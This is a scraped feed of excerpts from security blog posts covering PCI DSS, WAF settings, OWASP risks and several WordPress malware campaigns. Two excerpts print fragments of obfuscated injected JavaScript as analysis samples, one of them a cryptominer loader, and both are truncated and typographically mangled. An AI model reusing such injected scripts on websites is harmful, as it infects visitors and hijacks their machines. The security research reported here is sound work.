PCI for SMB: Requirement 9 – Implement Strong Access Control Measures

PCI for SMB: Requirement 9 – Implement Strong Access Control MeasuresWelcome to the sixth post of a series on understanding the Payment Card Industry Data Security Standard–PCI DSS. We want to show how PCI DSS affects anyone going through the compliance process using the PCI SAQ’s (Self Assessment Questionnaires).

In the previous articles written about PCI, we covered the following:

  • Requirement 1: Build and Maintain a Secure Network – Install and maintain a firewall configuration to protect cardholder data.
  • Requirement 2: Build and Maintain a Secure Network – Do not use vendor-supplied defaults for system passwords or other security parameters.

Continue reading PCI for SMB: Requirement 9 – Implement Strong Access Control Measures at Sucuri Blog.

Source: Scuri check

Real-Time Fine-Tuning of the WAF via API

Real-Time Fine-Tuning of the WAF via APIThough the Sucuri Firewall is simple to set up and protects your website immediately, it’s possible to have granular control of the WAF by using an API.

For instance, there’s a specific filter inside the WAF dashboard called Emergency DDoS. This filter basically increases the strength of the DDoS protection to an “emergency” level where most non-human access is blocked.

API to Boost Firewall Protection

The Firewall API is mostly used for whitelisting and clearing the website cache.

Continue reading Real-Time Fine-Tuning of the WAF via API at Sucuri Blog.

Source: Scuri check

Hackers Change WordPress Siteurl to Pastebin

Hackers Change WordPress Siteurl to PastebinLast Friday, we reported on a hack that used a vulnerability in the popular WP GDPR Compliance plugin to change WordPress siteurl settings to erealitatea[.]net. At that time it was not clear who was behind the massive attack, since the erealitatea[.]net domain didn’t work and the infection simply broke the compromised sites. Our SiteCheck scanner detected the infection on about 700 sites over the weekend and PublicWWW now currently returns 573 results.

Continue reading Hackers Change WordPress Siteurl to Pastebin at Sucuri Blog.

Source: Scuri check

Erealitatea[.]net Hack Corrupts Websites with WP GDPR Compliance Plugin Vulnerability

Erealitatea[.]net Hack Corrupts Websites with WP GDPR Compliance Plugin VulnerabilityWe have noticed a growing number of WordPress-based sites that have had their URL settings changed to hxxp://erealitatea[.]net. Further investigations show that the issue is related to a security vulnerability in the WP GDPR Compliance plugin for WordPress (with 100,000+ active installations).

The new General Data Protection Regulation (GDPR) laws in the EU have made the plugin extremely popular. Many sites are looking for an easy way to comply with these new laws, and adding this plugin is a simple solution for many website owners.

Continue reading Erealitatea[.]net Hack Corrupts Websites with WP GDPR Compliance Plugin Vulnerability at Sucuri Blog.

Source: Scuri check

10 Tips to Improve Your Website Security

10 Tips to Improve Your Website SecurityHaving a website has become easier than ever due to the proliferation of great tools and services in the web development space. Content management systems (CMS) like WordPress, Joomla!, Drupal, Magento, and others allow business owners to build an online presence rapidly. The CMS’s highly extensible architectures, rich plugins, and effective modules have reduced the need to spend years learning web development before starting to build a website.

The ease of launching an online business or personal website is great.

Continue reading 10 Tips to Improve Your Website Security at Sucuri Blog.

Source: Scuri check

New WordPress Security Email Course

New WordPress Security Email CourseRecent statistics show that over 32% of website administrators across the web use WordPress.

Unfortunately, the CMSs popularity comes at a price — attackers often seek out vulnerabilities to exploit and target unhardened WordPress sites. If a site is compromised, it often becomes the host of malicious malware or spam campaigns, harming your website’s reputation and visitors in the process.

Knowledge is power, and we’re here to help! We’ve created a new WordPress Security Email Course to help improve your website’s security posture and reduce the risk of a security incident.

Continue reading New WordPress Security Email Course at Sucuri Blog.

Source: Scuri check

Website Security Tips for Marketers

Website Security Tips for MarketersIn our previous post, we have discussed why marketers should have a proactive approach to website security. Today we are going to discuss some security tips marketers can put into practice. In the simplest terms, website security means three things here at Sucuri:

  • Protecting your website from compromises.
  • Monitoring for issues so you can react quickly.
  • Having a documented emergency response plan.

Marketers should champion these initiatives so they can be prioritized by their business development team.

Continue reading Website Security Tips for Marketers at Sucuri Blog.

Source: Scuri check

Web Marketers Should Learn Security

Web Marketers Should Learn SecurityMost online marketers think of themselves as T-shaped individuals. The theory behind this concept is that individuals possess a wide range of skills, with some abilities running deeper than others.

Website security awareness is in short supply and we need more champions — especially among small and medium-sized businesses. Digital marketers are in a prime position to add security know-how to their diverse toolkit.

Source: The T-Shaped Web Marketer by Rand Fishkin

It makes sense for marketers to want to secure their websites.

Continue reading Web Marketers Should Learn Security at Sucuri Blog.

Source: Scuri check

Saskmade[.]net Redirects

Saskmade[.]net RedirectsEarlier this week, we published a blog post about an ongoing massive malware campaign describing multiple infection vectors that it uses. This same week, we started detecting new modifications of the scripts injected by this attack.

The general idea of the malware is the same, but the domain name and obfuscation has changed slightly.

For example, in the wp_post table they now inject this script:

In the <head> section of HTML and PHP files, and at the top of jQuery-related JavaScript files, they inject this new obfuscated script:

var _0x1e35=[‘length’,’fromCharCode‘,’createElement’,’type’,’async’,’code121′,’src’,’appendChild’,’getElementsByTagName’,’script’];(function(_0x546a53,
…skipped…

Continue reading Saskmade[.]net Redirects at Sucuri Blog.

Source: Scuri check

OWASP Top 10 Security Risks – Part II

OWASP Top 10  Security Risks – Part IIIt is National Cyber Security Awareness Month and in order to bring awareness to what threatens the integrity of websites, we have started a series of posts on the OWASP top 10 security risks.

The OWASP Top 10 list consists of the 10 most seen application vulnerabilities:

  1. Injection
  2. Broken Authentication
  3. Sensitive data exposure
  4. XML External Entities (XXE)
  5. Broken Access control
  6. Security misconfigurations
  7. Cross-Site Scripting (XSS)
  8. Insecure Deserialization
  9. Using Components with known vulnerabilities
  10. Insufficient logging and monitoring

In our previous post, we explained the first two items on the OWASP Top 10 list: injection and broken authentication.

Continue reading OWASP Top 10 Security Risks – Part II at Sucuri Blog.

Source: Scuri check

Multiple Ways to Inject the Same Tech Support Scam Malware

Multiple Ways to Inject the Same Tech Support Scam MalwareLast month, we shared information about yet another series of ongoing massive infections using multiple different vectors to inject malicious scripts into WordPress websites.

Shortly after, the campaign changed the domain names used in its scripts. Now it mainly uses hotopponents[.]site and learningtoolkit[.]club.

At the time of this writing, PublicWWW finds the most common patterns of this malware on thousands of sites:

  • “var _0xfcc4=” – 8501 sites
  • “hotopponents.site/site.js” – 3636 sites

Database Injections

Multiple variations of the injected scripts have been found.

Continue reading Multiple Ways to Inject the Same Tech Support Scam Malware at Sucuri Blog.

Source: Scuri check

Creating a Response Plan You Can Trust

Creating a Response Plan You Can TrustAs a website owner, you may have experienced your website being down for any number of reasons. Maybe due to errors in code, server related difficulties or even being under attack from bad actors.

I once shared my own experience of a hacked website in a webinar. Whether you have one site or hundreds, when restoring your online presence it is imperative to have a process in place.

If Your Website Gets Hacked, What is Your Plan?

Continue reading Creating a Response Plan You Can Trust at Sucuri Blog.

Source: Scuri check

Malicious Redirects from NewShareCounts.com Tweet Counter

Malicious Redirects from NewShareCounts.com Tweet CounterWhen Twitter announced their new design for “Tweet” and “follow” buttons back in October 2015, marketers across the web developed a mild anxiety—the new design came with a decision to nuke their beloved Tweet count feature.

Social signals can be a huge credibility indicator for visitors and site content. Who doesn’t think there’s a psychological relationship between the number of social shares and the credibility of a content piece? It’s social validation, plain and simple.

Continue reading Malicious Redirects from NewShareCounts.com Tweet Counter at Sucuri Blog.

Source: Scuri check

Product Update: Sucuri Firewall in Singapore and Amsterdam

Product Update: Sucuri Firewall in Singapore and AmsterdamOver three years ago, we transitioned the Sucuri Firewall (WAF) away from the cloud and expanded it to run on top of our own Anycast content delivery network (CDN).

We provide security for websites with the protection of our WAF as well as performance benefits of a CDN. We have been adding data centers in key regions of the world:

  • San Jose – US
  • Dallas – US
  • Washington D.C.

Continue reading Product Update: Sucuri Firewall in Singapore and Amsterdam at Sucuri Blog.

Source: Scuri check

Security Monitoring Saves the Day

Security Monitoring Saves the DayFor the second week of  National Cyber Security Awareness Month, we would like to focus on a very important part in having a good website security posture: monitoring.

How can security monitoring save your day?

Most people only care about their website security after something bad has already happened. However, how can you tell when something is attempting to harm your website? Sometimes it is a very noticeable issue, such as:

  • website defacement – when the home page of the website is wiped out and something else appears in front of the visitor’s eyes;
  • unresponsive website – when the website pages respond too slowly or stop loading at all;
  • SEO spam – when the website listing in search engines shows unrelated spam keywords, often pharma keywords; or
  • a website blacklist warning – when a red warning page shows all your visitors that the website they are about to go to is not secure.

Continue reading Security Monitoring Saves the Day at Sucuri Blog.

Source: Scuri check

Obfuscated JavaScript Cryptominer

Obfuscated JavaScript CryptominerDuring an incident response investigation, we detected an interesting piece of heavily obfuscated JavaScript malware. Once decoded, we found out that cryptominers were running on visitor’s computers when they accessed our customer’s website.

We have previously discussed how cryptomining can happen in many covert ways. In this post, we will show you how a malicious code can create a cryptominer.

Malware that Creates Cryptominer Code

Take a look at the following malware:

<script>$=~[];$={:++$,$$$$:(![]+””)[$],$:++$,$$:(![]+””)[$],$:++$,$$$:({}+””)
[$],$$$:($[$]+””)[$],$$:++$,$$$:(!””+””)[$],$:++$,$_$:++$,$$:({}+””)
[$],$$
:++$,$$$:++$,$:++$,$$:++$};$.$=($.$=$+””)[$.$$]+($.$=$.$[$.$])+
($.$$=($.$+””)[$.
$])+((!$)+””)[$.$$]+($.=$.$[$.$$])+($.$=(!””+””)[$.$])+($.=(!””+””)
[$.$])+$.$[$.$$]+$.+$.$+$.$;$.$$=$.$+(!””+””)[$.$$]+$.+$.+$.$+$.$$;$.$=($.___)
[$.$
][$.$_];$.$($.$($.$$+”””+””+$.__$+$.$$_+$.$$_+$.$_$_.

Continue reading Obfuscated JavaScript Cryptominer at Sucuri Blog.

Source: Scuri check

OWASP Top 10 Security Risks – Part I

OWASP Top 10  Security Risks – Part IIt is National Cyber Security Awareness Month and in order to bring awareness to what threatens the integrity of websites, we would like to start a series of post on the OWASP top 10 security risks.

OWASP stands for the Open Web Application Security Project, an online community that produces articles, methodologies, documentation, tools, and technologies in the field of web application security.

OWASP Top 10 is the list of the 10 most seen application vulnerabilities.

Continue reading OWASP Top 10 Security Risks – Part I at Sucuri Blog.

Source: Scuri check

October Cybersecurity Month

October Cybersecurity MonthSince 2003, October has been recognized as National Cybersecurity Awareness Month. It is an annual campaign to raise awareness about the importance of cybersecurity and being a better digital citizen.

October has just started and a majority of security companies are promoting internet security. With the holidays fast approaching, it is a crucial time for website owners, especially ones with an e-commerce website, to be cyber secure.

The end of the year is also the season when hackers try to profit the most.

Continue reading October Cybersecurity Month at Sucuri Blog.

Source: Scuri check

PCI for SMB: Requirement 7 & 8 – Implement Strong Access Control Measures

PCI for SMB: Requirement 7 & 8 – Implement Strong Access Control MeasuresThis is the fifth post in a series of articles on understanding the Payment Card Industry Data Security Standard – PCI DSS. We are halfway there! In the previous articles about PCI, we covered the following:

  • Requirement 1: Build and Maintain a Secure Network – Install and maintain a firewall configuration to protect cardholder data.
  • Requirement 2: Build and Maintain a Secure Network – Do not use vendor-supplied defaults for system passwords or other security parameters.

Continue reading PCI for SMB: Requirement 7 & 8 – Implement Strong Access Control Measures at Sucuri Blog.

Source: Scuri check